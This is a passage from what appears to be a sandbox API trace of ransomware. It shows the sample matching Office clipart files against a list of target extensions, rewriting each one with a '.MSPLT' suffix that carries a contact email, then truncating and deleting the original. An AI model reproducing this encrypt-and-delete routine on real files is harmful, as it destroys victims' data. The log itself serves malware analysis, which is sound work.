lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0294.186] SetEndOfFile (hFile=0x48c) returned 1 [0294.187] CloseHandle (hObject=0x48c) returned 1 [0294.188] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.188] SetEndOfFile (hFile=0x478) returned 1 [0294.192] CloseHandle (hObject=0x478) returned 1 [0294.193] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.193] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf")) returned 1 [0294.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0294.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0294.194] lstrlenW (lpString=".doc") returned 4 [0294.194] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.194] lstrlenW (lpString=".docx") returned 5 [0294.194] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.194] lstrlenW (lpString=".pdf") returned 4 [0294.194] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.195] lstrlenW (lpString=".xls") returned 4 [0294.195] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.195] lstrlenW (lpString=".xlsx") returned 5 [0294.195] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.195] lstrlenW (lpString=".ppt") returned 4 [0294.195] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0294.195] lstrlenW (lpString=".zip") returned 4 [0294.195] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.195] lstrlenW (lpString=".rar") returned 4 [0294.195] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.195] lstrlenW (lpString=".bz2") returned 4 [0294.195] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.195] lstrlenW (lpString=".7z") returned 3 [0294.195] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0294.195] lstrlenW (lpString=".dbf") returned 4 [0294.195] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0294.195] lstrlenW (lpString=".1cd") returned 4 [0294.195] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0294.195] lstrlenW (lpString=".jpg") returned 4 [0294.196] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0294.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0294.196] lstrlenW (lpString=".doc") returned 4 [0294.196] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.196] lstrlenW (lpString=".docx") returned 5 [0294.196] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.196] lstrlenW (lpString=".pdf") returned 4 [0294.196] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.196] lstrlenW (lpString=".xls") returned 4 [0294.196] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.196] lstrlenW (lpString=".xlsx") returned 5 [0294.196] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.196] lstrlenW (lpString=".ppt") returned 4 [0294.196] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0294.196] lstrlenW (lpString=".zip") returned 4 [0294.196] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.196] lstrlenW (lpString=".rar") returned 4 [0294.196] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.196] lstrlenW (lpString=".bz2") returned 4 [0294.196] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.196] lstrlenW (lpString=".7z") returned 3 [0294.196] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0294.197] lstrlenW (lpString=".dbf") returned 4 [0294.197] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0294.197] lstrlenW (lpString=".1cd") returned 4 [0294.197] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0294.197] lstrlenW (lpString=".jpg") returned 4 [0294.197] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.197] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0294.197] lstrlenW (lpString="AN04196_.WMF") returned 12 [0294.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0294.231] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=3144) returned 1 [0294.231] CloseHandle (hObject=0x440) returned 1 [0294.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf")) returned 0x220 [0294.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0294.232] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.232] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0294.233] GetLastError () returned 0x0 [0294.234] ReadFile (in: hFile=0x440, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0xc48, lpOverlapped=0x0) returned 1 [0294.236] WriteFile (in: hFile=0x37c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xc50, lpOverlapped=0x0) returned 1 [0294.237] ReadFile (in: hFile=0x440, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0294.237] WriteFile (in: hFile=0x37c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0294.237] SetEndOfFile (hFile=0x37c) returned 1 [0294.238] CloseHandle (hObject=0x37c) returned 1 [0294.249] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.249] SetEndOfFile (hFile=0x440) returned 1 [0295.068] CloseHandle (hObject=0x440) returned 1 [0295.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0295.510] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf")) returned 1 [0295.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0295.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0295.511] lstrlenW (lpString=".doc") returned 4 [0295.511] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.511] lstrlenW (lpString=".docx") returned 5 [0295.511] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.511] lstrlenW (lpString=".pdf") returned 4 [0295.511] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.511] lstrlenW (lpString=".xls") returned 4 [0295.511] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.511] lstrlenW (lpString=".xlsx") returned 5 [0295.511] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.511] lstrlenW (lpString=".ppt") returned 4 [0295.511] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0295.512] lstrlenW (lpString=".zip") returned 4 [0295.512] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.512] lstrlenW (lpString=".rar") returned 4 [0295.512] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.512] lstrlenW (lpString=".bz2") returned 4 [0295.512] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.512] lstrlenW (lpString=".7z") returned 3 [0295.512] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0295.512] lstrlenW (lpString=".dbf") returned 4 [0295.512] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0295.512] lstrlenW (lpString=".1cd") returned 4 [0295.512] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0295.512] lstrlenW (lpString=".jpg") returned 4 [0295.512] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0295.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0295.512] lstrlenW (lpString=".doc") returned 4 [0295.512] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.512] lstrlenW (lpString=".docx") returned 5 [0295.512] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.512] lstrlenW (lpString=".pdf") returned 4 [0295.512] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.512] lstrlenW (lpString=".xls") returned 4 [0295.513] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.513] lstrlenW (lpString=".xlsx") returned 5 [0295.513] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.513] lstrlenW (lpString=".ppt") returned 4 [0295.513] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0295.513] lstrlenW (lpString=".zip") returned 4 [0295.513] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.513] lstrlenW (lpString=".rar") returned 4 [0295.513] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.513] lstrlenW (lpString=".bz2") returned 4 [0295.513] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.513] lstrlenW (lpString=".7z") returned 3 [0295.513] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0295.513] lstrlenW (lpString=".dbf") returned 4 [0295.513] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0295.513] lstrlenW (lpString=".1cd") returned 4 [0295.513] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0295.513] lstrlenW (lpString=".jpg") returned 4 [0295.513] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.514] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.514] lstrlenW (lpString="BD00141_.WMF") returned 12 [0295.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0295.514] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=26886) returned 1 [0295.514] CloseHandle (hObject=0x4c8) returned 1 [0295.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf")) returned 0x220 [0295.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0295.515] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0295.515] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0295.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4cc [0295.517] GetLastError () returned 0x0 [0295.517] ReadFile (in: hFile=0x4c8, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x6906, lpOverlapped=0x0) returned 1 [0295.520] WriteFile (in: hFile=0x4cc, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x6910, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x6910, lpOverlapped=0x0) returned 1 [0295.522] ReadFile (in: hFile=0x4c8, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0295.522] WriteFile (in: hFile=0x4cc, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0295.522] SetEndOfFile (hFile=0x4cc) returned 1 [0295.523] CloseHandle (hObject=0x4cc) returned 1 [0295.526] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0295.526] SetEndOfFile (hFile=0x4c8) returned 1 [0295.530] CloseHandle (hObject=0x4c8) returned 1 [0295.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0295.531] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf")) returned 1 [0295.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0295.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0295.532] lstrlenW (lpString=".doc") returned 4 [0295.532] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.532] lstrlenW (lpString=".docx") returned 5 [0295.532] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.532] lstrlenW (lpString=".pdf") returned 4 [0295.532] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.532] lstrlenW (lpString=".xls") returned 4 [0295.532] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.532] lstrlenW (lpString=".xlsx") returned 5 [0295.532] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.532] lstrlenW (lpString=".ppt") returned 4 [0295.532] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0295.532] lstrlenW (lpString=".zip") returned 4 [0295.532] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.532] lstrlenW (lpString=".rar") returned 4 [0295.533] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.533] lstrlenW (lpString=".bz2") returned 4 [0295.533] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.533] lstrlenW (lpString=".7z") returned 3 [0295.533] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0295.533] lstrlenW (lpString=".dbf") returned 4 [0295.533] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0295.533] lstrlenW (lpString=".1cd") returned 4 [0295.533] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0295.533] lstrlenW (lpString=".jpg") returned 4 [0295.533] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0295.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0295.533] lstrlenW (lpString=".doc") returned 4 [0295.533] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.533] lstrlenW (lpString=".docx") returned 5 [0295.533] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.533] lstrlenW (lpString=".pdf") returned 4 [0295.533] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.533] lstrlenW (lpString=".xls") returned 4 [0295.533] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.533] lstrlenW (lpString=".xlsx") returned 5 [0295.533] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.533] lstrlenW (lpString=".ppt") returned 4 [0295.533] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0295.533] lstrlenW (lpString=".zip") returned 4 [0295.533] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.534] lstrlenW (lpString=".rar") returned 4 [0295.534] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.534] lstrlenW (lpString=".bz2") returned 4 [0295.534] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.534] lstrlenW (lpString=".7z") returned 3 [0295.534] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0295.534] lstrlenW (lpString=".dbf") returned 4 [0295.534] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0295.534] lstrlenW (lpString=".1cd") returned 4 [0295.534] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0295.534] lstrlenW (lpString=".jpg") returned 4 [0295.534] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.534] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.534] lstrlenW (lpString="BD00146_.WMF") returned 12 [0295.534] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0295.539] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=28948) returned 1 [0295.539] CloseHandle (hObject=0x4c8) returned 1 [0295.539] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf")) returned 0x220 [0296.349] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0296.354] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0296.354] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0296.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0296.355] GetLastError () returned 0x0 [0296.355] ReadFile (in: hFile=0x464, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x7114, lpOverlapped=0x0) returned 1 [0296.366] WriteFile (in: hFile=0x4c0, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x7120, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x7120, lpOverlapped=0x0) returned 1 [0296.369] ReadFile (in: hFile=0x464, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0296.369] WriteFile (in: hFile=0x4c0, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0296.369] SetEndOfFile (hFile=0x4c0) returned 1 [0296.369] CloseHandle (hObject=0x4c0) returned 1 [0296.372] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, 